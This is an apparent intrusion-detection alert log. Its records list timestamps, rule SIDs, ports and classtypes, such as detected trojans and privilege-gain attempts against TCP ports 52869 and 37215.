                      Timestamp:07/20/24-23:01:42.477986
                      SID:2027339
                      Source Port:45052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.683685
                      SID:2831300
                      Source Port:33344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.222163
                      SID:2835222
                      Source Port:44174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.813013
                      SID:2025132
                      Source Port:55664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2829579
                      Source Port:50966
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.266026
                      SID:2027339
                      Source Port:50320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2835222
                      Source Port:44842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2829579
                      Source Port:44032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.331701
                      SID:2025132
                      Source Port:50740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.144153
                      SID:2831300
                      Source Port:40542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2835222
                      Source Port:38518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.729296
                      SID:2027339
                      Source Port:51236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.555329
                      SID:2025132
                      Source Port:33944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.030683
                      SID:2027339
                      Source Port:56748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.807714
                      SID:2027339
                      Source Port:49942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.049603
                      SID:2829579
                      Source Port:39784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.710739
                      SID:2027339
                      Source Port:44082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2829579
                      Source Port:51772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.915640
                      SID:2025132
                      Source Port:32862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.455725
                      SID:2025132
                      Source Port:39524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.655109
                      SID:2027339
                      Source Port:40878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.059916
                      SID:2025132
                      Source Port:54154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222254
                      SID:2835222
                      Source Port:52740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.170008
                      SID:2027339
                      Source Port:40856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.684499
                      SID:2831300
                      Source Port:42886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.300793
                      SID:2831300
                      Source Port:36788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.483441
                      SID:2027339
                      Source Port:33916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.483452
                      SID:2831300
                      Source Port:42042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.891313
                      SID:2025132
                      Source Port:49330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.474975
                      SID:2027339
                      Source Port:48700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565561
                      SID:2027339
                      Source Port:51710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.449345
                      SID:2027339
                      Source Port:42106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.396073
                      SID:2027339
                      Source Port:52322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.323363
                      SID:2027339
                      Source Port:49010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.757783
                      SID:2027339
                      Source Port:45030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.563416
                      SID:2831300
                      Source Port:42218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2829579
                      Source Port:38518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.164492
                      SID:2025132
                      Source Port:48656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.133950
                      SID:2027339
                      Source Port:39136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.973966
                      SID:2025132
                      Source Port:33896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2829579
                      Source Port:52838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.826949
                      SID:2027339
                      Source Port:53120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.250832
                      SID:2831300
                      Source Port:33106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.619597
                      SID:2027339
                      Source Port:40584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290281
                      SID:2025132
                      Source Port:35222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2835222
                      Source Port:41674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.269055
                      SID:2027339
                      Source Port:51420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633389
                      SID:2829579
                      Source Port:41340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2829579
                      Source Port:40534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2829579
                      Source Port:53102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2829579
                      Source Port:51646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.975418
                      SID:2829579
                      Source Port:41700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.210798
                      SID:2831300
                      Source Port:46472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.902509
                      SID:2027339
                      Source Port:49078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2829579
                      Source Port:48482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2829579
                      Source Port:36510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2835222
                      Source Port:59428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.452219
                      SID:2025132
                      Source Port:48536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.906061
                      SID:2027339
                      Source Port:34986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.501913
                      SID:2027339
                      Source Port:55566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.990535
                      SID:2829579
                      Source Port:45656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.534135
                      SID:2027339
                      Source Port:46008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2829579
                      Source Port:49962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.977046
                      SID:2027339
                      Source Port:58520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2829579
                      Source Port:49718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2829579
                      Source Port:51258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.142802
                      SID:2027339
                      Source Port:39466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.007557
                      SID:2025132
                      Source Port:54884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.882275
                      SID:2027339
                      Source Port:46336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.403768
                      SID:2027339
                      Source Port:58964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.611005
                      SID:2831300
                      Source Port:56342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2829579
                      Source Port:49516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2835222
                      Source Port:55394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.355606
                      SID:2027339
                      Source Port:38094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.781934
                      SID:2025132
                      Source Port:42460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2835222
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2835222
                      Source Port:58234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.171532
                      SID:2027339
                      Source Port:38296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.624686
                      SID:2831300
                      Source Port:45650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.229799
                      SID:2027339
                      Source Port:36008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.605496
                      SID:2027339
                      Source Port:44080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2835222
                      Source Port:43154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2829579
                      Source Port:60840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.118041
                      SID:2025132
                      Source Port:51140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2835222
                      Source Port:48012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.311969
                      SID:2027339
                      Source Port:44292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.772926
                      SID:2027339
                      Source Port:56254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.484620
                      SID:2025132
                      Source Port:41228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.310207
                      SID:2835222
                      Source Port:56386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.042994
                      SID:2027339
                      Source Port:49708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2829579
                      Source Port:60380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.475010
                      SID:2027339
                      Source Port:39358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.878047
                      SID:2027339
                      Source Port:43212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.660927
                      SID:2027339
                      Source Port:46228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.138222
                      SID:2831300
                      Source Port:50114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.290281
                      SID:2025132
                      Source Port:60796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.921416
                      SID:2831300
                      Source Port:45906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.811792
                      SID:2027339
                      Source Port:37034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2835222
                      Source Port:57400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699598
                      SID:2027339
                      Source Port:45996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2835222
                      Source Port:39016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.098209
                      SID:2829579
                      Source Port:38716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.327422
                      SID:2025132
                      Source Port:52236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:07.236630
                      SID:2027339
                      Source Port:51288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.014513
                      SID:2027339
                      Source Port:59542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2835222
                      Source Port:58904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.028836
                      SID:2829579
                      Source Port:48510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.340763
                      SID:2027339
                      Source Port:53506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.335084
                      SID:2027339
                      Source Port:57196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.262010
                      SID:2027339
                      Source Port:38122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.042994
                      SID:2025132
                      Source Port:44160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.881568
                      SID:2027339
                      Source Port:35860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.310738
                      SID:2027339
                      Source Port:48768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.297941
                      SID:2025132
                      Source Port:58120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:22.907274
                      SID:2831300
                      Source Port:36456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2835222
                      Source Port:33326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.679304
                      SID:2829579
                      Source Port:56008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.165362
                      SID:2025132
                      Source Port:60300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.622888
                      SID:2831300
                      Source Port:53192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.281781
                      SID:2027339
                      Source Port:34146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.954688
                      SID:2027339
                      Source Port:50170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.063023
                      SID:2027339
                      Source Port:51810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.991548
                      SID:2829579
                      Source Port:49102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2829579
                      Source Port:38912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.366269
                      SID:2027339
                      Source Port:59642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.372363
                      SID:2025132
                      Source Port:60180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221132
                      SID:2829579
                      Source Port:49188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677485
                      SID:2027339
                      Source Port:32882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.109699
                      SID:2027339
                      Source Port:40610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2835222
                      Source Port:44054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333071
                      SID:2831300
                      Source Port:34288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.030153
                      SID:2025132
                      Source Port:35806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.861753
                      SID:2027339
                      Source Port:60648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.329969
                      SID:2027339
                      Source Port:39478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.005947
                      SID:2831300
                      Source Port:56014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.222080
                      SID:2829579
                      Source Port:46562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2835222
                      Source Port:46360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2835222
                      Source Port:55316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.630703
                      SID:2835222
                      Source Port:33210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.809920
                      SID:2831300
                      Source Port:60818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2829579
                      Source Port:45350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.914948
                      SID:2027339
                      Source Port:54606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.838688
                      SID:2027339
                      Source Port:50076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.422401
                      SID:2027339
                      Source Port:53670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.862410
                      SID:2835222
                      Source Port:40984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.496780
                      SID:2025132
                      Source Port:55182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.313415
                      SID:2025132
                      Source Port:38028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.631010
                      SID:2829579
                      Source Port:55038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.372363
                      SID:2025132
                      Source Port:43162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.392806
                      SID:2027339
                      Source Port:59554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2835222
                      Source Port:40562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.481591
                      SID:2027339
                      Source Port:33528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.965131
                      SID:2027339
                      Source Port:34594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.667238
                      SID:2027339
                      Source Port:56994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.775798
                      SID:2025132
                      Source Port:40262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.156178
                      SID:2025132
                      Source Port:49758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.629616
                      SID:2831300
                      Source Port:44946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.688551
                      SID:2027339
                      Source Port:49478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2835222
                      Source Port:40676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.197251
                      SID:2027339
                      Source Port:53646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.704267
                      SID:2027339
                      Source Port:55242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.278892
                      SID:2025132
                      Source Port:35746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.663244
                      SID:2027339
                      Source Port:41736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.964831
                      SID:2831300
                      Source Port:35084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2829579
                      Source Port:58700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.027932
                      SID:2025132
                      Source Port:40596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.266338
                      SID:2831300
                      Source Port:44988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.520145
                      SID:2027339
                      Source Port:50896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.854405
                      SID:2027339
                      Source Port:50904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2835222
                      Source Port:48414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.001165
                      SID:2025132
                      Source Port:60444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2835222
                      Source Port:36712
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596401
                      SID:2831300
                      Source Port:46360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2829579
                      Source Port:33566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.420715
                      SID:2025132
                      Source Port:41268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.452218
                      SID:2831300
                      Source Port:52330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.590753
                      SID:2831300
                      Source Port:46306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.731900
                      SID:2027339
                      Source Port:56188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.897212
                      SID:2027339
                      Source Port:53882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2829579
                      Source Port:48176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2835222
                      Source Port:48390
                      Destination Port:37215
